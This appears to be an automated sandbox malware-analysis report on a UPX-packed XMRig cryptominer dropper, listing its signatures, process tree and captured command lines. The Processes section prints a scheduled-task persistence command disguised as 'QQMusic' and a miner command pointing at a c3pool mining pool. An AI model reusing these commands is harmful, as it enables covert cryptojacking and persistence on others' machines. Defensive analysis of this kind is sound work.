Malware Analysis Report

2025-01-06 20:27

Sample ID 240614-rzpvpsvcnh
Target 2cf24966a6aad7b6ecffe04a20eaf3dd.exe
SHA256 01c9940b468ce2a58f2bc52f5c8b7d0310451c994d798879ff653d92fbaf8719
Tags
xmrig miner persistence upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

01c9940b468ce2a58f2bc52f5c8b7d0310451c994d798879ff653d92fbaf8719

Threat Level: Known bad

The file 2cf24966a6aad7b6ecffe04a20eaf3dd.exe was found to be: Known bad.

Malicious Activity Summary

xmrig miner persistence upx

xmrig

XMRig Miner payload

Executes dropped EXE

Loads dropped DLL

UPX packed file

Adds Run key to start application

Enumerates connected drives

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Checks processor information in registry

Creates scheduled task(s)

Gathers network information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-14 14:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 14:38

Reported

2024-06-14 14:40

Platform

win7-20240508-en

Max time kernel

150s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2cf24966a6aad7b6ecffe04a20eaf3dd.exe" C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2cf24966a6aad7b6ecffe04a20eaf3dd.exe" C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\syabcd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3016 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 2168 wrote to memory of 2552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2168 wrote to memory of 2552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2168 wrote to memory of 2552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2168 wrote to memory of 2552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3016 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2600 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2600 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2600 wrote to memory of 2416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3016 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2808 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2808 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2808 wrote to memory of 1368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 3016 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\SMB.exe
PID 3016 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\SMB.exe
PID 3016 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\SMB.exe
PID 3016 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\SMB.exe
PID 3016 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 1416 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 956 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 956 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 956 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 956 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3016 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 2988 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2988 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2988 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 2988 wrote to memory of 328 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ipconfig.exe
PID 3016 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\Windows\SysWOW64\cmd.exe
PID 3016 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe
PID 3016 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe C:\ProgramData\syabcd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe

"C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2cf24966a6aad7b6ecffe04a20eaf3dd.exe /F

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\ProgramData\SMB.exe

C:\ProgramData\SMB.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\Windows\SysWOW64\cmd.exe

cmd /c taskkill /f /im syabcd.exe&&exit

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im syabcd.exe

C:\ProgramData\syabcd.exe

C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SB250 -p 1 --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K

C:\Windows\SysWOW64\cmd.exe

cmd /c ipconfig /flushdns

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /flushdns

C:\Windows\SysWOW64\cmd.exe

